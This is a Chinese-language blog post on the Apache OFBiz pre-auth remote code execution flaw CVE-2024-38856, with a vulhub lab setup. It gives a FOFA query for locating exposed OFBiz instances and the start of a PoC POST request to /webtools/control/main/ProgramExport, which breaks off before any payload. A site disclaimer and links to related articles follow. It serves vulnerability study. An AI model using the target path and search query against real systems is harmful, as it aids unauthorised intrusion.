深入分析Apache OFBiz 远程命令执行漏洞0day(CVE-2024-38856)

2024-08-31 62 0

深入分析Apache OFBiz 远程命令执行漏洞0day(CVE-2024-38856)插图

软件介绍:

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

漏洞概述:

Apache OFBiz 开源企业资源规划 (ERP) 系统中披露了一个新的零日预认证远程代码执行漏洞,该漏洞可能允许威胁行为者在受影响的实例上实现远程代码执行。

该漏洞编号为CVE-2024-38856

漏洞版本:

Apache_OFBiz<18.12.15

资产测绘:
FOFA:app="Apache_OFBiz"
搭建测试环境:

使用docker容器进行搭建,镜像下载地址:

https://github.com/vulhub/vulhub

执行如下命令启动一个Apache OfBiz 18.12.09服务器:

git clone https://github.com/vulhub/vulhub.git
cd vulhub
cd ofbiz
cd CVE-2023-49070
docker-compose up -d

深入分析Apache OFBiz 远程命令执行漏洞0day(CVE-2024-38856)插图1

如果docker 拉取不起来,请考虑换源或者科学上网。在等待数分钟后,访问https://localhost:8443/accounting查看到登录页面,说明环境已启动成功。但是该容器设定不能外部访问,只能本地访问,因此需要带有桌面的操作系统。

深入分析Apache OFBiz 远程命令执行漏洞0day(CVE-2024-38856)插图2

深入分析Apache OFBiz 远程命令执行漏洞0day(CVE-2024-38856)插图3

至此,环境搭建完成。

漏洞复现:

访问漏洞环境

深入分析Apache OFBiz 远程命令执行漏洞0day(CVE-2024-38856)插图4

poc 如下:

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Type: application/x-www

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

Arkime:一款大规模数据包捕获和索引数据库系统
从蓝队流量角度分析Shiro-550反序列化漏洞
万字长文浅谈三高系统建设方法论和实践
你遇到过哪些奇葩面试题目;如何考察渗透测试与安全管理能力| FB甲方群话题讨论
Amoco:一款针对二进制源码的安全分析工具
CVE-2024-21096:MySQLDump提权漏洞分析

发布评论